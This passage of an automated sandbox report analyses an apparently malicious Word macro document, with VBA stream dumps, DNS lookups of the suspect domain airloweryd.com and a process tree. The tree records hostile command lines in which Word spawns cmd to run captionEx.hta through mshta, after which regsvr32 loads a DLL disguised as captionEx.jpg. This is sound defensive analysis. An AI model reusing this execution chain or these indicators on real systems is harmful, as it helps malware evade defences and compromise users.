                                                                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 1699
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/__SRP_0
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:1699
                                                                                                                                                Entropy:3.60340858827
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ Z . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . ] . I > . ] % O . L . . . f . ! . . . . . . . . . . .
                                                                                                                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                                                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 190
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/__SRP_1
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:190
                                                                                                                                                Entropy:1.69732927545
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 532
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/__SRP_2
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:532
                                                                                                                                                Entropy:2.02890248311
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 01 00 71 07 00 00 00 00 00 00 00 00 00 00 a1 07 00 00 00 00 00 00 00 00 00 00 d1 07
                                                                                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 156
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/__SRP_3
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:156
                                                                                                                                                Entropy:1.78206636307
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d 38 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                                Stream Path: VBA/dir, File Type: data, Stream Size: 619
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/dir
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:619
                                                                                                                                                Entropy:6.4433751069
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:. g . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . . b . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . . . m . .
                                                                                                                                                Data Raw:01 67 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 80 87 e6 62 0c 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                                Network Behavior

                                                                                                                                                Snort IDS Alerts

                                                                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                07/22/21-11:01:07.680252ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                07/22/21-11:01:08.693819ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                                                Network Port Distribution

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Jul 22, 2021 11:07:17.739833117 CEST5128153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:17.797709942 CEST53512818.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:18.494061947 CEST4919953192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:18.546040058 CEST53491998.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:19.189157009 CEST5062053192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:19.248090982 CEST53506208.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:19.880923033 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:19.940860033 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:20.996990919 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:21.056550026 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:22.002937078 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:22.052428961 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:23.030917883 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:23.083050966 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:24.404320002 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:24.456423998 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:25.120083094 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:25.191421032 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:25.678229094 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:25.751029968 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:26.637149096 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:26.686731100 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:26.698755026 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:26.758359909 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:27.722356081 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:27.744676113 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:27.779227018 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:27.804259062 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:29.201803923 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:29.722686052 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:29.772525072 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:29.792258024 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:29.865468979 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:30.244442940 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:30.552294016 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:30.602024078 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:31.268158913 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:31.629506111 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:31.681982040 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:32.310007095 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:32.578005075 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:32.630451918 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:33.838854074 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:33.898646116 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:34.315712929 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:34.367851019 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:35.590749979 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:35.651304960 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:46.846013069 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:46.898132086 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:47.803630114 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:47.855843067 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:48.827471972 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:48.879653931 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:50.642983913 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:50.693608046 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:52.379605055 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:52.439775944 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:07:57.651113033 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:07:57.724838018 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:08:10.124610901 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:08:10.197741985 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:08:12.334948063 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:08:12.396703959 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:08:26.606961966 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:08:26.674323082 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:08:29.395251989 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:08:29.457317114 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:09:01.912866116 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:09:01.978456974 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                Jul 22, 2021 11:09:03.416968107 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                Jul 22, 2021 11:09:03.483196974 CEST53565798.8.8.8192.168.2.3

                                                                                                                                                ICMP Packets

                                                                                                                                                TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                Jul 22, 2021 11:07:32.310205936 CEST192.168.2.38.8.8.8cff1(Port unreachable)Destination Unreachable

                                                                                                                                                DNS Queries

                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                Jul 22, 2021 11:07:29.201803923 CEST192.168.2.38.8.8.80xad28Standard query (0)airloweryd.comA (IP address)IN (0x0001)
                                                                                                                                                Jul 22, 2021 11:07:30.244442940 CEST192.168.2.38.8.8.80xad28Standard query (0)airloweryd.comA (IP address)IN (0x0001)

                                                                                                                                                DNS Answers

                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                Jul 22, 2021 11:07:31.268158913 CEST8.8.8.8192.168.2.30xad28Server failure (2)airloweryd.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                Jul 22, 2021 11:07:32.310007095 CEST8.8.8.8192.168.2.30xad28Server failure (2)airloweryd.comnonenoneA (IP address)IN (0x0001)

                                                                                                                                                Code Manipulations

                                                                                                                                                Statistics

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:11:07:22
                                                                                                                                                Start date:22/07/2021
                                                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                Imagebase:0x860000
                                                                                                                                                File size:1937688 bytes
                                                                                                                                                MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:07:25
                                                                                                                                                Start date:22/07/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:cmd /c c:\programdata\captionEx.hta
                                                                                                                                                Imagebase:0xbd0000
                                                                                                                                                File size:232960 bytes
                                                                                                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:07:26
                                                                                                                                                Start date:22/07/2021
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff6b2800000
                                                                                                                                                File size:625664 bytes
                                                                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:07:26
                                                                                                                                                Start date:22/07/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Windows\SysWOW64\mshta.exe' 'C:\programdata\captionEx.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                                Imagebase:0x13c0000
                                                                                                                                                File size:13312 bytes
                                                                                                                                                MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:07:31
                                                                                                                                                Start date:22/07/2021
                                                                                                                                                Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Windows\System32\regsvr32.exe' c:\users\public\captionEx.jpg
                                                                                                                                                Imagebase:0x880000
                                                                                                                                                File size:20992 bytes
                                                                                                                                                MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                Disassembly

                                                                                                                                                Code Analysis

                                                                                                                                                Reset < >